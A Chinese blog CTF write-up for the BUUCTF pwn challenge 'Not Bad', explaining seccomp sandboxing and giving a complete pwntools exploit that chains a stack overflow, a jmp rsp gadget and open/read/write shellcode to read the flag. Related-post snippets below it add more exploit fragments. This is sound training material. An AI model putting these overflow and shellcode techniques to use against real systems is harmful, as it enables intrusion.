[BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)

最新推荐文章于 2022-03-28 23:46:09 发布
最新推荐文章于 2022-03-28 23:46:09 发布
阅读量552 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/115350879
版权

[BUUCTF-pwn]——[极客大挑战 2019]Not Bad

又是一道收获满满的题目.

peak小知识

  • seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的syscall,这是不安全的,比如程序劫持程序流后通过execve的syscall来getshell。所以可以通过seccomp_init、seccomp_rule_add、seccomp_load配合 或者prctl来ban掉一些系统调用.
  • seccomp-tools: 沙盒工具, 可以查看那些系统调用可以被使用, 安装在我的环境搭建专栏里面有, 也可以点我点我
    保护基本木有开启, 只是开启了地址随机化
    在这里插入图片描述
    在IDA中看看
    利用mmap创建了从0x123000开始长度为0x1000的可执行区域.
    不清楚的可以看下之前的peak小知识, 或者百度.
    在这里插入图片描述
    发现一些系统调用被禁用
    在这里插入图片描述

利用沙盒查看下, 发现read、write、open、exit系统调用可以使用.
一个典型的ORW问题
在这里插入图片描述

继续看IDA
在这里插入图片描述

其实可以在栈上进行编写shellcode的,但是发现大小不够
所以可以转跳至mmap的区域, 我们可以利用栈劫持, 将程序劫持到我们的栈上, 使其按照我们想要的方式运行

下面是exploit

exploit

from pwn import *

p=remote('node3.buuoj.cn',26573)
p = process('./bad')
context.binary=ELF('./bad')
#gdb.attach(p, 'b puts')
mmap=0x123000
jmp_rsp=0x400A01

# 劫持到栈上并执行buf的代码
payload1=(asm(shellcraft.read(0,mmap,0x100))+asm("mov rax,0x123000;call rax")).ljust(0x28,'\x00')+p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp")
p.sendafter('have fun!',payload1)

#其实这个基本都是这样可以记着
payload2=shellcraft.open('./flag')
payload2+=shellcraft.read(3,mmap+0x100,0x50)
payload2+=shellcraft.write(1,mmap+0x100,0x50)

p.send(asm(payload2))
p.interactive()
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BUUCTF]PWN——[极客挑战 2019]Not Badorw_shellcode)
mcmuyanga的博客
01-30 2739
[极客挑战 2019]Not Bad 附件 步骤
[BUUCTF]PWN——[极客挑战 2019]Not Bad详细解释
weixin_46521144的博客
03-25 951
从这道题可以学到shellcode的一般使用方法,和orw的一般方法 这道题开启了secure computing mood 使用seccomp看到可以使用的函数 使用vmmap查看哪里可以写shellcode IDA中也有看到使用vmmap开启了一段内存 这里mmap参数类型是(起始地址,大小,保护类,文件描述符等) 我们只需要关注保护类权限 PROT_READ是0x1 PROT_WRITE是0x2 PROT_EXEC是0x4 也就是read,write,execute的顺序,那么这里是6,也就是
极客挑战_2019_Not_Bad
z1r0的博客
01-17 2924
极客挑战_2019_Not_Bad shellcode题目 mmap了一块空间,加了沙盒来个orw。 可以考虑栈迁移,但是既然可以shellcode,那就看一下怎么使用 前面mmap了一块,可以将shellcode写到mmap那里,然后借助gadget跳到mmap去执行。 刚好有一个jmp rsp这个跳板,思路就是使用jmp rsp这个跳板跳到buf头中被写入的payload。再用shellcraft.read(0, mmap, 0x100) mov rax,0x123000;call rax这两
buuoj刷题记录 - [极客挑战 2019]Not Bad
qq_34010404的博客
03-28 405
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
BUUCTF之“[极客挑战 2019]Not Bad 1”
Probeginner的博客
12-16 271
简单orw
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[极客挑战 2019]Not Bad的另一种思路
chennbnbnb的博客
10-22 326
保护 漏洞 算上rbp只有0x20的溢出空间 思路1 利用jmp rsp的GG执行栈上的shellcode,这个思路用的人很多,就不再说了 思路2:不使用jmp rsp 如果需要开启shellcode,最常用的就是ret到shellcode的地址,为了获取shellcode地址,那么就有了两个选择 泄露栈地址,做不到 栈迁移到一个已知位置 通过leave指令使得rbp = 已知空间buf之后,需要在0x18长度内完成两件事情 向buf中写入exp leave+ret让rsp迁
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4813
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
pwn 进阶(1)
weixin_44113469的博客
02-07 974
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛复盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
pwn 进阶(2)
weixin_44113469的博客
02-07 436
pwn improve(2) 0x01 plan1(produce vulnerable program ) my important jop is to Debugger。 pwn1(20200315) this topic is anther lgd,the topic i produced before。 [key point]: 1.heap overlap 2.seccomp 3.rop 4.shellcode wp: there is a heap overlap in the add fun
[极客挑战 2019]Not Bad刷题
qq_43766802的博客
09-28 586
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20大小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp,利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
pwn】 [极客挑战 2019]Not Bad
Nothing
03-10 1184
例行检查 开了沙箱 程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20大小不够rop,所以尝试别的方法。程序在最开始mmap了一块内存,可写可执行,那么接下来目标就是1.在这块内存上写shellcode 2.跳转过来执行 由于不能rop且栈是可执行的想到能不能进行jmp rsp。在程序中找到了这个指令。 那么就可以在buf上布置read以...
[极客挑战 2019]Http
xlcvv的博客
04-05 599
F12审查元素,有一个Secret.php文件: 进去瞅一眼: 翻译: 你不是从https://www.Sycsecret.com来 就是构造header: 得到flag(老是忘了google的hackbar有这个add header功能,害的我老是去burp里面做) ...
[buuoj][极客挑战 2019]Havefun
qq_42250840的博客
06-26 303
打开网址查看源码 发现一段php,看样子是要求get传递cat并且值为dog 构造?cat=dog 直接得flag
[极客挑战 2019] web题-Knife
BROTHERYY的博客
07-07 274
复现环境:buuoj.cn 进入环境得到提示 白给了兄弟! 直接上菜刀或者蚁剑 连上以后直接到根目录去找!
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值